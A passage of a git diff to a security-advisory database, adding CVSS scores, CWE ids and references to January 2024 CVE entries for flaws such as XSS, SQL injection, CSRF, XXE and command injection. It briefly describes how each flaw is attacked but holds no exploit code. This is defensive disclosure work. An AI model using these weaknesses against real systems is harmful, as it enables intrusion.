"aliases": [ + "CVE-2023-6279" + ], + "details": "The Woostify Sites Library WordPress plugin before 1.4.8 does not have authorisation in an AJAX action, allowing any authenticated users, such as subscriber to update arbitrary blog options and set them to 'activated' which could lead to DoS when using a specific option name", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6279" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/626bbc7d-0d0f-4418-ac61-666278a1cbdb/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json b/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json index b35072e74a493..d4460837d4d67 100644 --- a/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json +++ b/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9xx5-8h94-vx2v", - "modified": "2024-01-26T15:30:32Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T15:30:32Z", "aliases": [ "CVE-2024-22550" ], "details": "An arbitrary file upload vulnerability in the component /alsdemo/ss/mediam.cgi of ShopSite v14.0 allows attackers to execute arbitrary code via uploading a crafted SVG file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T15:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json b/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json index e83af328b875b..4d7138b44a0f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json +++ b/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9xx9-hjg7-g9jj", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48129" ], "details": "An issue in kimono-oldnew mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T08:15:42Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json b/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json index a285613ef77d5..fbc0be3dfd91f 100644 --- a/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json +++ b/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-c2j8-9924-mr82/GHSA-c2j8-9924-mr82.json b/advisories/unreviewed/2024/01/GHSA-c2j8-9924-mr82/GHSA-c2j8-9924-mr82.json new file mode 100644 index 0000000000000..3e87ad1020c50 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c2j8-9924-mr82/GHSA-c2j8-9924-mr82.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c2j8-9924-mr82", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22140" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder Pro.This issue affects Profile Builder Pro: from n/a through 3.10.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22140" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-csrf-leading-to-account-takeover-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json b/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json index 6324a32c6c72a..e186497fd31ea 100644 --- a/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json +++ b/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c2jp-pq2c-g7jh", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2023-48202" ], "details": "Cross-Site Scripting (XSS) vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate privileges via a crafted SVG file in the File Manager component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T06:15:47Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json b/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json index 456de9b2f21fb..59f8645a8ff5c 100644 --- a/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json +++ b/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c352-2vg8-m9gr", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0810" ], "details": "Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c39j-wph3-8c3c/GHSA-c39j-wph3-8c3c.json b/advisories/unreviewed/2024/01/GHSA-c39j-wph3-8c3c/GHSA-c39j-wph3-8c3c.json new file mode 100644 index 0000000000000..06580f3525829 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c39j-wph3-8c3c/GHSA-c39j-wph3-8c3c.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c39j-wph3-8c3c", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2022-47072" + ], + "details": "SQL injection vulnerability in Enterprise Architect 16.0.1605 32-bit allows attackers to run arbitrary SQL commands via the Find parameter in the Select Classifier dialog box..", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47072" + }, + { + "type": "WEB", + "url": "https://github.com/DojoSecurity/Enterprise-Architect-SQL-Injection" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c5g8-87c9-j99r/GHSA-c5g8-87c9-j99r.json b/advisories/unreviewed/2024/01/GHSA-c5g8-87c9-j99r/GHSA-c5g8-87c9-j99r.json new file mode 100644 index 0000000000000..c5e03725f39b5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c5g8-87c9-j99r/GHSA-c5g8-87c9-j99r.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5g8-87c9-j99r", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-1103" + ], + "details": "A vulnerability was found in CodeAstro Real Estate Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file profile.php of the component Feedback Form. The manipulation of the argument Your Feedback with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252458 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1103" + }, + { + "type": "WEB", + "url": "https://docs.google.com/document/d/18M55HRrxHQ9Jhph6CwWF-d5epAKtOSHt/edit?usp=drive_link&ouid=105609487033659389545&rtpof=true&sd=true" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252458" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T15:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c5mq-q8c8-ppcw/GHSA-c5mq-q8c8-ppcw.json b/advisories/unreviewed/2024/01/GHSA-c5mq-q8c8-ppcw/GHSA-c5mq-q8c8-ppcw.json new file mode 100644 index 0000000000000..293139ad6e1f9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c5mq-q8c8-ppcw/GHSA-c5mq-q8c8-ppcw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5mq-q8c8-ppcw", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-21803" + ], + "details": "Use After Free vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (bluetooth modules) allows Local Execution of Code. This vulnerability is associated with program files https://gitee.Com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/af_bluetooth.C.\n\nThis issue affects Linux kernel: from v2.6.12-rc2 before v6.8-rc1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21803" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8081" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T08:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json b/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json index a740e434a4d5f..7a11cd892d55e 100644 --- a/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json +++ b/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json b/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json index 5bb9cc4c2257e..f3e0b62cbcb95 100644 --- a/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json +++ b/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c67q-c83x-f549", - "modified": "2024-01-24T03:31:25Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T03:31:25Z", "aliases": [ "CVE-2024-21796" ], "details": "Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-611" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T02:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json b/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json index 3e382ebe5bb28..b223510a67c6e 100644 --- a/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json +++ b/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c69w-p7cc-6h7c", - "modified": "2024-01-26T06:30:31Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T06:30:31Z", "aliases": [ "CVE-2023-38323" ], "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the status path script entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T05:15:12Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json b/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json index e58851fcd5dae..18a096f6a4480 100644 --- a/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json +++ b/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c6mw-5fmv-25qx", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23219" ], "details": "The issue was addressed with improved authentication. This issue is fixed in iOS 17.3 and iPadOS 17.3. Stolen Device Protection may be unexpectedly disabled.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-287" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c6mx-w98j-fgrj/GHSA-c6mx-w98j-fgrj.json b/advisories/unreviewed/2024/01/GHSA-c6mx-w98j-fgrj/GHSA-c6mx-w98j-fgrj.json new file mode 100644 index 0000000000000..9d6dd22e9abaf --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c6mx-w98j-fgrj/GHSA-c6mx-w98j-fgrj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c6mx-w98j-fgrj", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-01-30T09:30:33Z", + "aliases": [ + "CVE-2023-52071" + ], + "details": "tiny-curl-8_4_0 , curl-8_4_0 and curl-8_5_0 were discovered to contain an off-by-one out-of-bounds array index via the component tool_cb_wrt.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52071" + }, + { + "type": "WEB", + "url": "https://github.com/curl/curl/commit/73980f9ace6c7577e7fcab8008bbde8a0a231692" + }, + { + "type": "WEB", + "url": "https://github.com/curl/curl/commit/af3f4e41#r127212213" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-129" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c7jw-pgmq-gj8x/GHSA-c7jw-pgmq-gj8x.json b/advisories/unreviewed/2024/01/GHSA-c7jw-pgmq-gj8x/GHSA-c7jw-pgmq-gj8x.json new file mode 100644 index 0000000000000..23d31525cd20b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c7jw-pgmq-gj8x/GHSA-c7jw-pgmq-gj8x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7jw-pgmq-gj8x", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-22836" + ], + "details": "In cases where a multi-tenant stack user is operating Foundry’s Linter service, and the user changes a group name from the default value, the renamed value may be visible to the rest of the stack’s tenants.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22836" + }, + { + "type": "WEB", + "url": "https://palantir.safebase.us/?tcuUid=f9bf67ef-be15-4f87-a526-bf6064e8f682" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c822-34mg-g7p6/GHSA-c822-34mg-g7p6.json b/advisories/unreviewed/2024/01/GHSA-c822-34mg-g7p6/GHSA-c822-34mg-g7p6.json new file mode 100644 index 0000000000000..a4880e15f9057 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c822-34mg-g7p6/GHSA-c822-34mg-g7p6.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c822-34mg-g7p6", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-1010" + ], + "details": "A vulnerability classified as problematic has been found in SourceCodester Employee Management System 1.0. This affects an unknown part of the file edit-profile.php. The manipulation of the argument fullname/phone/date of birth/address/date of appointment leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252279.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1010" + }, + { + "type": "WEB", + "url": "https://github.com/jomskiller/Employee-Management-System---Stored-XSS" + }, + { + "type": "WEB", + "url": "https://github.com/jomskiller/Employee-Management-System---Stored-XSS/" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252279" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json b/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json index 191c7ea5d0347..51a43faa8c631 100644 --- a/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json +++ b/advisories/unreviewed/2024/01/GHSA-c87c-56pw-mwgh/GHSA-c87c-56pw-mwgh.json @@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json b/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json index 46f83a136071d..ea7437bc85ffe 100644 --- a/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json +++ b/advisories/unreviewed/2024/01/GHSA-c978-j9mm-m34q/GHSA-c978-j9mm-m34q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c978-j9mm-m34q", - "modified": "2024-01-16T21:31:21Z", + "modified": "2024-01-30T15:30:20Z", "published": "2024-01-16T21:31:21Z", "aliases": [ "CVE-2023-49351" ], "details": "A stack-based buffer overflow vulnerability in /bin/webs binary in Edimax BR6478AC V2 firmware veraion v1.23 allows attackers to overwrite other values located on the stack due to an incorrect use of the strcpy() function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-16T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json b/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json index 787c78514c0f6..49e4a5ad0a57b 100644 --- a/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json +++ b/advisories/unreviewed/2024/01/GHSA-cc2p-6hmp-4729/GHSA-cc2p-6hmp-4729.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json b/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json index 6586d9988b196..0a77eff253618 100644 --- a/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json +++ b/advisories/unreviewed/2024/01/GHSA-ccwc-jrj7-h4v6/GHSA-ccwc-jrj7-h4v6.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20932" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0002/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json b/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json index 0a29e9e6ef789..4f4f8a5fad16d 100644 --- a/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json +++ b/advisories/unreviewed/2024/01/GHSA-ccxg-74mw-mcc5/GHSA-ccxg-74mw-mcc5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ccxg-74mw-mcc5", - "modified": "2024-01-25T09:30:21Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T09:30:21Z", "aliases": [ "CVE-2023-33757" ], "details": "A lack of SSL certificate validation in Splicecom iPCS (iOS App) v1.3.4, iPCS2 (iOS App) v2.8 and before, and iPCS (Android App) v1.8.5 and before allows attackers to eavesdrop on communications via a man-in-the-middle attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-295" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T08:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json b/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json index 01603e9ef6993..9d5f0ef56129e 100644 --- a/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json +++ b/advisories/unreviewed/2024/01/GHSA-cmmq-7g27-wvv8/GHSA-cmmq-7g27-wvv8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cmmq-7g27-wvv8", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2024-0697" @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-22" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json b/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json index 0a03a4cdf6bd2..4805f28af6826 100644 --- a/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json +++ b/advisories/unreviewed/2024/01/GHSA-cmqr-cw5f-xffm/GHSA-cmqr-cw5f-xffm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cmqr-cw5f-xffm", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52091" ], "details": "An anti-spyware engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-crc6-rq97-7rcx/GHSA-crc6-rq97-7rcx.json b/advisories/unreviewed/2024/01/GHSA-crc6-rq97-7rcx/GHSA-crc6-rq97-7rcx.json new file mode 100644 index 0000000000000..dc6060fc22d0a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-crc6-rq97-7rcx/GHSA-crc6-rq97-7rcx.json @@ -0,0 +1,38 @@ +{ + 